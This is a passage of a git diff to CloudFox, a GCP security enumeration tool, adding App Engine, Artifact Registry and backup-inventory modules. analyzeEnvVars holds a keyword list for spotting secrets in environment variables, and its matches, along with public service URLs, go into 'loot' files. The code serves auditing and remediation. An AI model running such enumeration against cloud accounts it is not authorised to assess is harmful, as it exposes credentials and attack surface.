m.mu.Lock() + m.Services = append(m.Services, serviceRecord) + m.mu.Unlock() + + // Get ingress settings from service (applies to all versions) + ingressSettings := "all" // Default + if svc.NetworkSettings != nil && svc.NetworkSettings.IngressTrafficAllowed != "" { + ingressSettings = svc.NetworkSettings.IngressTrafficAllowed + } + + // Get versions for this service + m.enumerateVersions(ctx, projectID, svc.Id, ingressSettings, aeService, logger) + } +} + +func (m *AppEngineModule) enumerateVersions(ctx context.Context, projectID, serviceID, ingressSettings string, aeService *appengine.APIService, logger internal.Logger) { + versions, err := aeService.Apps.Services.Versions.List(projectID, serviceID).Do() + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing App Engine versions for service %s: %v", serviceID, err), GCP_APPENGINE_MODULE_NAME) + } + return + } + + for _, ver := range versions.Versions { + versionRecord := AppEngineVersion{ + ID: ver.Id, + ServiceID: serviceID, + AppID: projectID, + ProjectID: projectID, + Runtime: ver.Runtime, + Environment: ver.Env, + ServingStatus: ver.ServingStatus, + CreateTime: ver.CreateTime, + RiskLevel: "LOW", + } + + // Instance class + if ver.InstanceClass != "" { + versionRecord.InstanceClass = ver.InstanceClass + } + + // Network settings + if ver.Network != nil { + versionRecord.Network = ver.Network.Name + } + + // VPC connector + if ver.VpcAccessConnector != nil { + versionRecord.VPCConnector = ver.VpcAccessConnector.Name + } + + // Ingress settings (from service level) + versionRecord.IngressSettings = ingressSettings + + // Service account + versionRecord.ServiceAccount = ver.ServiceAccount + + // Scaling type + if ver.AutomaticScaling != nil { + versionRecord.Scaling = "automatic" + if ver.AutomaticScaling.MaxConcurrentRequests > 0 { + versionRecord.AutomaticScaling = fmt.Sprintf("max_concurrent: %d", ver.AutomaticScaling.MaxConcurrentRequests) + } + } else if ver.BasicScaling != nil { + versionRecord.Scaling = "basic" + versionRecord.BasicScaling = fmt.Sprintf("max_instances: %d", ver.BasicScaling.MaxInstances) + } else if ver.ManualScaling != nil { + versionRecord.Scaling = "manual" + versionRecord.ManualScaling = fmt.Sprintf("instances: %d", ver.ManualScaling.Instances) + } + + // URL + versionRecord.URL = ver.VersionUrl + + // Check for deprecated runtime + versionRecord.DeprecatedRuntime = m.isDeprecatedRuntime(ver.Runtime) + if versionRecord.DeprecatedRuntime { + versionRecord.RiskLevel = "MEDIUM" + + m.mu.Lock() + m.SecurityIssues = append(m.SecurityIssues, AppEngineSecurityIssue{ + ServiceID: serviceID, + VersionID: ver.Id, + ProjectID: projectID, + IssueType: "deprecated-runtime", + Severity: "MEDIUM", + Description: fmt.Sprintf("Runtime %s is deprecated and may have security vulnerabilities", ver.Runtime), + Remediation: "Migrate to a supported runtime version", + }) + m.mu.Unlock() + } + + // Check environment variables for secrets + if ver.EnvVariables != nil { + versionRecord.EnvVarCount = len(ver.EnvVariables) + secretCount := m.analyzeEnvVars(ver.EnvVariables, serviceID, ver.Id, projectID) + versionRecord.SecretEnvVars = secretCount + if secretCount > 0 { + versionRecord.RiskLevel = "CRITICAL" + } + } + + // Check ingress settings for public access + if versionRecord.IngressSettings == "all" { + m.mu.Lock() + m.publicCount++ + if versionRecord.RiskLevel == "LOW" { + versionRecord.RiskLevel = "MEDIUM" + } + m.SecurityIssues = append(m.SecurityIssues, AppEngineSecurityIssue{ + ServiceID: serviceID, + VersionID: ver.Id, + ProjectID: projectID, + IssueType: "public-ingress", + Severity: "MEDIUM", + Description: "Service accepts traffic from all sources", + Remediation: "Consider using 'internal-only' or 'internal-and-cloud-load-balancing' ingress", + }) + m.mu.Unlock() + } + + // Check for default service account + if versionRecord.ServiceAccount == "" || strings.Contains(versionRecord.ServiceAccount, "@appspot.gserviceaccount.com") { + m.mu.Lock() + m.SecurityIssues = append(m.SecurityIssues, AppEngineSecurityIssue{ + ServiceID: serviceID, + VersionID: ver.Id, + ProjectID: projectID, + IssueType: "default-service-account", + Severity: "LOW", + Description: "Using default App Engine service account", + Remediation: "Create a dedicated service account with minimal permissions", + }) + m.mu.Unlock() + } + + m.mu.Lock() + m.Versions = append(m.Versions, versionRecord) + m.mu.Unlock() + } +} + +func (m *AppEngineModule) enumerateFirewallRules(ctx context.Context, projectID string, aeService *appengine.APIService, logger internal.Logger) { + rules, err := aeService.Apps.Firewall.IngressRules.List(projectID).Do() + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing App Engine firewall rules for project %s: %v", projectID, err), GCP_APPENGINE_MODULE_NAME) + } + return + } + + for _, rule := range rules.IngressRules { + fwRule := AppEngineFirewallRule{ + Priority: rule.Priority, + Action: rule.Action, + SourceRange: rule.SourceRange, + Description: rule.Description, + ProjectID: projectID, + } + + m.mu.Lock() + m.FirewallRules = append(m.FirewallRules, fwRule) + m.mu.Unlock() + + // Check for overly permissive rules + if rule.Action == "ALLOW" && rule.SourceRange == "*" { + m.mu.Lock() + m.SecurityIssues = append(m.SecurityIssues, AppEngineSecurityIssue{ + ServiceID: "all", + VersionID: "all", + ProjectID: projectID, + IssueType: "permissive-firewall", + Severity: "HIGH", + Description: fmt.Sprintf("Firewall rule (priority %d) allows all traffic", rule.Priority), + Remediation: "Restrict source ranges to known IP addresses", + }) + m.mu.Unlock() + } + } + + // Update app record with firewall count + m.mu.Lock() + for i := range m.Apps { + if m.Apps[i].ProjectID == projectID { + m.Apps[i].FirewallRules = len(rules.IngressRules) + break + } + } + m.mu.Unlock() +} + +func (m *AppEngineModule) analyzeEnvVars(envVars map[string]string, serviceID, versionID, projectID string) int { + secretPatterns := map[string]string{ + "PASSWORD": "password", + "SECRET": "secret", + "API_KEY": "api-key", + "TOKEN": "token", + "PRIVATE_KEY": "credential", + "DATABASE_URL": "connection-string", + "DB_PASSWORD": "password", + "MYSQL_PASSWORD": "password", + "POSTGRES_PASSWORD": "password", + "MONGODB_URI": "connection-string", + "AWS_SECRET": "credential", + "ENCRYPTION_KEY": "credential", + "JWT_SECRET": "credential", + "SESSION_SECRET": "credential", + } + + secretCount := 0 + + for name := range envVars { + nameUpper := strings.ToUpper(name) + for pattern, secretType := range secretPatterns { + if strings.Contains(nameUpper, pattern) { + secretCount++ + m.mu.Lock() + m.secretsFound++ + + m.SecurityIssues = append(m.SecurityIssues, AppEngineSecurityIssue{ + ServiceID: serviceID, + VersionID: versionID, + ProjectID: projectID, + IssueType: "secret-in-env", + Severity: "CRITICAL", + Description: fmt.Sprintf("Potential %s found in environment variable: %s", secretType, name), + Remediation: "Use Secret Manager instead of environment variables for secrets", + }) + + // Add to loot + m.LootMap["secrets-exposure"].Contents += fmt.Sprintf( + "Service: %s, Version: %s, Env Var: %s (%s)\n", + serviceID, versionID, name, secretType, + ) + m.mu.Unlock() + break + } + } + } + + return secretCount +} + +func (m *AppEngineModule) isDeprecatedRuntime(runtime string) bool { + deprecatedRuntimes := []string{ + "python27", + "go111", + "go112", + "go113", + "java8", + "java11", + "nodejs10", + "nodejs12", + "php55", + "php72", + "ruby25", + } + + for _, deprecated := range deprecatedRuntimes { + if runtime == deprecated { + return true + } + } + return false +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *AppEngineModule) initializeLootFiles() { + m.LootMap["app-engine-commands"] = &internal.LootFile{ + Name: "app-engine-commands", + Contents: "# App Engine Security Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["public-services"] = &internal.LootFile{ + Name: "public-services", + Contents: "# Public App Engine Services\n# Generated by CloudFox\n\n", + } + m.LootMap["secrets-exposure"] = &internal.LootFile{ + Name: "secrets-exposure", + Contents: "# Secrets Exposed in Environment Variables\n# Generated by CloudFox\n# CRITICAL: Migrate these to Secret Manager!\n\n", + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sort versions by risk level + sort.Slice(m.Versions, func(i, j int) bool { + riskOrder := map[string]int{"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3} + return riskOrder[m.Versions[i].RiskLevel] < riskOrder[m.Versions[j].RiskLevel] + }) + + // App Engine Apps table + appsHeader := []string{ + "App ID", + "Project", + "Location", + "Status", + "Hostname", + "FW Rules", + } + + var appsBody [][]string + for _, app := range m.Apps { + appsBody = append(appsBody, []string{ + app.ID, + app.ProjectID, + app.LocationID, + app.ServingStatus, + truncateString(app.DefaultHostname, 40), + fmt.Sprintf("%d", app.FirewallRules), + }) + } + + // App Engine Services table + servicesHeader := []string{ + "Service", + "Project", + "Versions", + } + + var servicesBody [][]string + for _, svc := range m.Services { + versionsCount := 0 + for _, ver := range m.Versions { + if ver.ServiceID == svc.ID && ver.ProjectID == svc.ProjectID { + versionsCount++ + } + } + + servicesBody = append(servicesBody, []string{ + svc.ID, + svc.ProjectID, + fmt.Sprintf("%d", versionsCount), + }) + } + + // App Engine Versions table + versionsHeader := []string{ + "Service", + "Version", + "Runtime", + "Env", + "Ingress", + "Scaling", + "Risk", + } + + var versionsBody [][]string + for _, ver := range m.Versions { + versionsBody = append(versionsBody, []string{ + ver.ServiceID, + ver.ID, + ver.Runtime, + ver.Environment, + ver.IngressSettings, + ver.Scaling, + ver.RiskLevel, + }) + + // Add public services to loot + if ver.IngressSettings == "all" { + m.LootMap["public-services"].Contents += fmt.Sprintf( + "Service: %s, Version: %s, URL: %s\n", + ver.ServiceID, ver.ID, ver.URL, + ) + } + } + + // Security Issues table + issuesHeader := []string{ + "Service", + "Version", + "Issue", + "Severity", + "Description", + } + + var issuesBody [][]string + for _, issue := range m.SecurityIssues { + issuesBody = append(issuesBody, []string{ + issue.ServiceID, + issue.VersionID, + issue.IssueType, + issue.Severity, + truncateString(issue.Description, 40), + }) + + // Add remediation commands + m.LootMap["app-engine-commands"].Contents += fmt.Sprintf( + "# %s - %s (%s)\n# %s\n# Remediation: %s\n\n", + issue.ServiceID, issue.VersionID, issue.IssueType, + issue.Description, issue.Remediation, + ) + } + + // Firewall Rules table + firewallHeader := []string{ + "Priority", + "Action", + "Source Range", + "Project", + "Description", + } + + var firewallBody [][]string + for _, rule := range m.FirewallRules { + firewallBody = append(firewallBody, []string{ + fmt.Sprintf("%d", rule.Priority), + rule.Action, + rule.SourceRange, + rule.ProjectID, + truncateString(rule.Description, 30), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{} + + if len(appsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "app-engine-apps", + Header: appsHeader, + Body: appsBody, + }) + } + + if len(servicesBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "app-engine-services", + Header: servicesHeader, + Body: servicesBody, + }) + } + + if len(versionsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "app-engine-versions", + Header: versionsHeader, + Body: versionsBody, + }) + } + + if len(issuesBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "security-issues", + Header: issuesHeader, + Body: issuesBody, + }) + } + + if len(firewallBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "firewall-rules", + Header: firewallHeader, + Body: firewallBody, + }) + } + + output := AppEngineOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_APPENGINE_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/artifact-registry.go b/gcp/commands/artifact-registry.go index 56ec8b27..9575cf23 100644 --- a/gcp/commands/artifact-registry.go +++ b/gcp/commands/artifact-registry.go @@ -182,6 +182,23 @@ func (m *ArtifactRegistryModule) initializeLootFiles() { Name: "container-registry-commands", Contents: "# GCP Container Registry (gcr.io) Commands\n# Generated by CloudFox\n# Legacy Container Registry - consider migrating to Artifact Registry\n\n", } + // New enhancement loot files + m.LootMap["artifact-registry-vulnerability-scanning"] = &internal.LootFile{ + Name: "artifact-registry-vulnerability-scanning", + Contents: "# GCP Artifact Registry Vulnerability Scanning Commands\n# Use Container Analysis API to scan for vulnerabilities\n# Generated by CloudFox\n\n", + } + m.LootMap["artifact-registry-no-cleanup"] = &internal.LootFile{ + Name: "artifact-registry-no-cleanup", + Contents: "# GCP Artifact Registry Repositories WITHOUT Cleanup Policies\n# These repositories may accumulate old artifacts\n# Generated by CloudFox\n\n", + } + m.LootMap["artifact-registry-remote-repos"] = &internal.LootFile{ + Name: "artifact-registry-remote-repos", + Contents: "# GCP Artifact Registry Remote Repositories\n# These proxy external registries - check for misconfigurations\n# Generated by CloudFox\n\n", + } + m.LootMap["artifact-registry-security-recommendations"] = &internal.LootFile{ + Name: "artifact-registry-security-recommendations", + Contents: "# GCP Artifact Registry Security Recommendations\n# Generated by CloudFox\n\n", + } } func (m *ArtifactRegistryModule) addRepositoryToLoot(repo ArtifactRegistryService.RepositoryInfo) { @@ -267,6 +284,90 @@ func (m *ArtifactRegistryModule) addRepositoryToLoot(repo ArtifactRegistryServic } m.LootMap["artifact-registry-iam-bindings"].Contents += "\n" } + + // Enhancement: Vulnerability scanning commands for Docker repos + if repo.Format == "DOCKER" { + m.LootMap["artifact-registry-vulnerability-scanning"].Contents += fmt.Sprintf( + "# Repository: %s (Project: %s, Location: %s)\n"+ + "# List vulnerability occurrences:\n"+ + "gcloud artifacts docker images list %s-docker.pkg.dev/%s/%s --show-occurrences --occurrence-filter=\"kind=VULNERABILITY\"\n"+ + "# Get detailed vulnerabilities for a specific image:\n"+ + "# gcloud artifacts docker images describe %s-docker.pkg.dev/%s/%s/IMAGE:TAG --show-package-vulnerability\n\n", + repoName, repo.ProjectID, repo.Location, + repo.Location, repo.ProjectID, repoName, + repo.Location, repo.ProjectID, repoName, + ) + } + + // Enhancement: No cleanup policies + if repo.CleanupPolicies == 0 { + m.LootMap["artifact-registry-no-cleanup"].Contents += fmt.Sprintf( + "# Repository: %s (Project: %s, Location: %s)\n"+ + "# Format: %s, Mode: %s\n"+ + "# No cleanup policies - old artifacts may accumulate\n"+ + "# Add cleanup policy: gcloud artifacts repositories set-cleanup-policies %s --location=%s --project=%s --policy=\n\n", + repoName, repo.ProjectID, repo.Location, + repo.Format, repo.Mode, + repoName, repo.Location, repo.ProjectID, + ) + } + + // Enhancement: Remote repositories + if strings.Contains(repo.Mode, "REMOTE") { + m.LootMap["artifact-registry-remote-repos"].Contents += fmt.Sprintf( + "# Repository: %s (Project: %s, Location: %s)\n"+ + "# Mode: %s - Proxies external registry\n"+ + "# Check configuration: gcloud artifacts repositories describe %s --location=%s --project=%s\n"+ + "# Remote repos may cache external images - check for sensitive data\n\n", + repoName, repo.ProjectID, repo.Location, + repo.Mode, + repoName, repo.Location, repo.ProjectID, + ) + } + + // Add security recommendations + m.addRepositorySecurityRecommendations(repo, repoName) +} + +// addRepositorySecurityRecommendations generates security recommendations for a repository +func (m *ArtifactRegistryModule) addRepositorySecurityRecommendations(repo ArtifactRegistryService.RepositoryInfo, repoName string) { + hasRecommendations := false + recommendations := fmt.Sprintf("# REPOSITORY: %s (Project: %s, Location: %s)\n", repoName, repo.ProjectID, repo.Location) + + // Public access + if repo.IsPublic { + hasRecommendations = true + recommendations += fmt.Sprintf("# [CRITICAL] Repository is publicly accessible: %s\n", repo.PublicAccess) + recommendations += "# Remediation: Remove public access\n" + recommendations += fmt.Sprintf("gcloud artifacts repositories remove-iam-policy-binding %s --location=%s --member=allUsers --role=roles/artifactregistry.reader\n", + repoName, repo.Location) + } + + // Google-managed encryption + if repo.EncryptionType == "Google-managed" { + hasRecommendations = true + recommendations += "# [INFO] Using Google-managed encryption - consider CMEK for compliance\n" + } + + // No cleanup policies + if repo.CleanupPolicies == 0 { + hasRecommendations = true + recommendations += "# [LOW] No cleanup policies configured - old artifacts may accumulate\n" + recommendations += fmt.Sprintf("# Add cleanup: gcloud artifacts repositories set-cleanup-policies %s --location=%s --policy=cleanup.json\n", + repoName, repo.Location) + } + + // Legacy container registry + if repo.RegistryType == "container-registry" { + hasRecommendations = true + recommendations += "# [MEDIUM] Using legacy Container Registry (gcr.io)\n" + recommendations += "# Recommendation: Migrate to Artifact Registry for better security features\n" + recommendations += fmt.Sprintf("# Migration guide: https://cloud.google.com/artifact-registry/docs/transition/transition-from-gcr\n") + } + + if hasRecommendations { + m.LootMap["artifact-registry-security-recommendations"].Contents += recommendations + "\n" + } } func (m *ArtifactRegistryModule) addArtifactToLoot(artifact ArtifactRegistryService.ArtifactInfo) { diff --git a/gcp/commands/backupinventory.go b/gcp/commands/backupinventory.go new file mode 100644 index 00000000..e46073c3 --- /dev/null +++ b/gcp/commands/backupinventory.go @@ -0,0 +1,884 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + "time" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/compute/v1" + "google.golang.org/api/sqladmin/v1beta4" +) + +// Module name constant +const GCP_BACKUPINVENTORY_MODULE_NAME string = "backup-inventory" + +var GCPBackupInventoryCommand = &cobra.Command{ + Use: GCP_BACKUPINVENTORY_MODULE_NAME, + Aliases: []string{"backups", "backup", "snapshots", "dr"}, + Short: "Enumerate backup policies, protected resources, and identify backup gaps", + Long: `Inventory backup and disaster recovery configurations across GCP resources. + +Features: +- Compute Engine disk snapshots and snapshot schedules +- Cloud SQL automated backups and point-in-time recovery +- Cloud Storage object versioning and lifecycle policies +- Filestore backups +- GKE backup configurations +- Identifies unprotected resources (no backup coverage) +- Analyzes backup retention policies +- Checks for stale or failing backups + +Requires appropriate IAM permissions: +- roles/compute.viewer +- roles/cloudsql.viewer +- roles/storage.admin`, + Run: runGCPBackupInventoryCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type BackupPolicy struct { + Name string + ProjectID string + ResourceType string // compute-snapshot, sql-backup, gcs-versioning, filestore-backup + Enabled bool + Schedule string + RetentionDays int + LastBackup string + BackupCount int + TargetResources []string + Location string + Status string + Encryption string +} + +type ProtectedResource struct { + Name string + ProjectID string + ResourceType string + BackupType string + LastBackup string + BackupCount int + RetentionDays int + BackupStatus string + PITREnabled bool + BackupLocation string +} + +type UnprotectedResource struct { + Name string + ProjectID string + ResourceType string + Location string + SizeGB int64 + RiskLevel string + Reason string + Remediation string +} + +type ComputeSnapshot struct { + Name string + ProjectID string + SourceDisk string + Status string + DiskSizeGB int64 + StorageBytes int64 + CreationTime string + Labels map[string]string + StorageLocats []string + AutoDelete bool + SnapshotType string +} + +type SnapshotSchedule struct { + Name string + ProjectID string + Region string + Schedule string + RetentionDays int + AttachedDisks int + SnapshotLabels map[string]string + StorageLocats []string +} + +type SQLBackup struct { + InstanceName string + ProjectID string + BackupID string + Status string + Type string + StartTime string + EndTime string + WindowStartTim string + SizeBytes int64 + Location string + Encrypted bool +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type BackupInventoryModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + BackupPolicies []BackupPolicy + ProtectedResources []ProtectedResource + UnprotectedResources []UnprotectedResource + Snapshots []ComputeSnapshot + SnapshotSchedules []SnapshotSchedule + SQLBackups []SQLBackup + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Tracking maps + disksWithBackups map[string]bool + sqlWithBackups map[string]bool + allDisks map[string]int64 // disk name -> size GB + allSQLInstances map[string]bool +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type BackupInventoryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BackupInventoryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BackupInventoryOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPBackupInventoryCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_BACKUPINVENTORY_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &BackupInventoryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + BackupPolicies: []BackupPolicy{}, + ProtectedResources: []ProtectedResource{}, + UnprotectedResources: []UnprotectedResource{}, + Snapshots: []ComputeSnapshot{}, + SnapshotSchedules: []SnapshotSchedule{}, + SQLBackups: []SQLBackup{}, + LootMap: make(map[string]*internal.LootFile), + disksWithBackups: make(map[string]bool), + sqlWithBackups: make(map[string]bool), + allDisks: make(map[string]int64), + allSQLInstances: make(map[string]bool), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *BackupInventoryModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Inventorying backup configurations and identifying gaps...", GCP_BACKUPINVENTORY_MODULE_NAME) + + // Create service clients + computeService, err := compute.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Compute service: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) + return + } + + sqlService, err := sqladmin.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create SQL Admin service: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) + } + } + + // Process each project + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, computeService, sqlService, logger) + }(projectID) + } + wg.Wait() + + // Identify unprotected resources + m.identifyUnprotectedResources(logger) + + // Check results + totalProtected := len(m.ProtectedResources) + totalUnprotected := len(m.UnprotectedResources) + + if totalProtected == 0 && totalUnprotected == 0 { + logger.InfoM("No backup data found", GCP_BACKUPINVENTORY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d protected resource(s), %d unprotected resource(s)", + totalProtected, totalUnprotected), GCP_BACKUPINVENTORY_MODULE_NAME) + + if totalUnprotected > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] %d resource(s) without backup coverage", totalUnprotected), GCP_BACKUPINVENTORY_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *BackupInventoryModule) processProject(ctx context.Context, projectID string, computeService *compute.Service, sqlService *sqladmin.Service, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating backups for project: %s", projectID), GCP_BACKUPINVENTORY_MODULE_NAME) + } + + // List all disks first (for gap analysis) + m.enumerateDisks(ctx, projectID, computeService, logger) + + // List snapshots + m.enumerateSnapshots(ctx, projectID, computeService, logger) + + // List snapshot schedules + m.enumerateSnapshotSchedules(ctx, projectID, computeService, logger) + + // List SQL instances and backups + if sqlService != nil { + m.enumerateSQLBackups(ctx, projectID, sqlService, logger) + } +} + +func (m *BackupInventoryModule) enumerateDisks(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Disks.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.DiskAggregatedList) error { + for _, diskList := range page.Items { + if diskList.Disks == nil { + continue + } + for _, disk := range diskList.Disks { + m.mu.Lock() + m.allDisks[disk.SelfLink] = disk.SizeGb + m.mu.Unlock() + } + } + return nil + }) + + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing disks for project %s: %v", projectID, err), GCP_BACKUPINVENTORY_MODULE_NAME) + } + } +} + +func (m *BackupInventoryModule) enumerateSnapshots(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Snapshots.List(projectID) + err := req.Pages(ctx, func(page *compute.SnapshotList) error { + for _, snapshot := range page.Items { + snap := ComputeSnapshot{ + Name: snapshot.Name, + ProjectID: projectID, + SourceDisk: snapshot.SourceDisk, + Status: snapshot.Status, + DiskSizeGB: snapshot.DiskSizeGb, + StorageBytes: snapshot.StorageBytes, + CreationTime: snapshot.CreationTimestamp, + Labels: snapshot.Labels, + StorageLocats: snapshot.StorageLocations, + AutoDelete: snapshot.AutoCreated, + SnapshotType: snapshot.SnapshotType, + } + + m.mu.Lock() + m.Snapshots = append(m.Snapshots, snap) + // Mark disk as having backups + m.disksWithBackups[snapshot.SourceDisk] = true + m.mu.Unlock() + } + return nil + }) + + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing snapshots for project %s: %v", projectID, err), GCP_BACKUPINVENTORY_MODULE_NAME) + } + } + + // Track protected resources from snapshots + m.trackSnapshotProtection(projectID) +} + +func (m *BackupInventoryModule) trackSnapshotProtection(projectID string) { + // Group snapshots by source disk + diskSnapshots := make(map[string][]ComputeSnapshot) + for _, snap := range m.Snapshots { + if snap.ProjectID == projectID { + diskSnapshots[snap.SourceDisk] = append(diskSnapshots[snap.SourceDisk], snap) + } + } + + m.mu.Lock() + defer m.mu.Unlock() + + for diskURL, snaps := range diskSnapshots { + // Find latest snapshot + var latestTime time.Time + var latestSnap ComputeSnapshot + for _, snap := range snaps { + t, err := time.Parse(time.RFC3339, snap.CreationTime) + if err == nil && t.After(latestTime) { + latestTime = t + latestSnap = snap + } + } + + protected := ProtectedResource{ + Name: m.extractDiskName(diskURL), + ProjectID: projectID, + ResourceType: "compute-disk", + BackupType: "snapshot", + LastBackup: latestSnap.CreationTime, + BackupCount: len(snaps), + BackupStatus: latestSnap.Status, + BackupLocation: strings.Join(latestSnap.StorageLocats, ","), + } + + // Calculate age of last backup + if !latestTime.IsZero() { + age := time.Since(latestTime) + if age > 7*24*time.Hour { + protected.BackupStatus = "STALE" + } else { + protected.BackupStatus = "CURRENT" + } + } + + m.ProtectedResources = append(m.ProtectedResources, protected) + } +} + +func (m *BackupInventoryModule) enumerateSnapshotSchedules(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.ResourcePolicies.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.ResourcePolicyAggregatedList) error { + for region, policyList := range page.Items { + if policyList.ResourcePolicies == nil { + continue + } + for _, policy := range policyList.ResourcePolicies { + if policy.SnapshotSchedulePolicy == nil { + continue + } + + schedule := SnapshotSchedule{ + Name: policy.Name, + ProjectID: projectID, + Region: m.extractRegionFromURL(region), + } + + // Parse schedule + if policy.SnapshotSchedulePolicy.Schedule != nil { + if policy.SnapshotSchedulePolicy.Schedule.DailySchedule != nil { + schedule.Schedule = "daily" + } else if policy.SnapshotSchedulePolicy.Schedule.WeeklySchedule != nil { + schedule.Schedule = "weekly" + } else if policy.SnapshotSchedulePolicy.Schedule.HourlySchedule != nil { + schedule.Schedule = "hourly" + } + } + + // Parse retention + if policy.SnapshotSchedulePolicy.RetentionPolicy != nil { + schedule.RetentionDays = int(policy.SnapshotSchedulePolicy.RetentionPolicy.MaxRetentionDays) + } + + // Parse labels + if policy.SnapshotSchedulePolicy.SnapshotProperties != nil { + schedule.SnapshotLabels = policy.SnapshotSchedulePolicy.SnapshotProperties.Labels + schedule.StorageLocats = policy.SnapshotSchedulePolicy.SnapshotProperties.StorageLocations + } + + m.mu.Lock() + m.SnapshotSchedules = append(m.SnapshotSchedules, schedule) + + // Add as backup policy + bp := BackupPolicy{ + Name: policy.Name, + ProjectID: projectID, + ResourceType: "compute-snapshot-schedule", + Enabled: true, + Schedule: schedule.Schedule, + RetentionDays: schedule.RetentionDays, + Location: schedule.Region, + Status: policy.Status, + } + m.BackupPolicies = append(m.BackupPolicies, bp) + m.mu.Unlock() + } + } + return nil + }) + + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing snapshot schedules for project %s: %v", projectID, err), GCP_BACKUPINVENTORY_MODULE_NAME) + } + } +} + +func (m *BackupInventoryModule) enumerateSQLBackups(ctx context.Context, projectID string, sqlService *sqladmin.Service, logger internal.Logger) { + // List SQL instances + instances, err := sqlService.Instances.List(projectID).Do() + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing SQL instances for project %s: %v", projectID, err), GCP_BACKUPINVENTORY_MODULE_NAME) + } + return + } + + for _, instance := range instances.Items { + m.mu.Lock() + m.allSQLInstances[instance.Name] = true + m.mu.Unlock() + + // Check backup configuration + backupEnabled := false + pitrEnabled := false + var retentionDays int + var backupStartTime string + + if instance.Settings != nil && instance.Settings.BackupConfiguration != nil { + backupEnabled = instance.Settings.BackupConfiguration.Enabled + pitrEnabled = instance.Settings.BackupConfiguration.PointInTimeRecoveryEnabled + retentionDays = int(instance.Settings.BackupConfiguration.TransactionLogRetentionDays) + backupStartTime = instance.Settings.BackupConfiguration.StartTime + } + + if backupEnabled { + m.mu.Lock() + m.sqlWithBackups[instance.Name] = true + m.mu.Unlock() + + // Add as backup policy + bp := BackupPolicy{ + Name: fmt.Sprintf("%s-backup", instance.Name), + ProjectID: projectID, + ResourceType: "sql-automated-backup", + Enabled: true, + Schedule: fmt.Sprintf("Daily at %s", backupStartTime), + RetentionDays: retentionDays, + TargetResources: []string{instance.Name}, + Location: instance.Region, + Status: "ACTIVE", + } + + m.mu.Lock() + m.BackupPolicies = append(m.BackupPolicies, bp) + m.mu.Unlock() + } + + // List actual backups for this instance + backups, err := 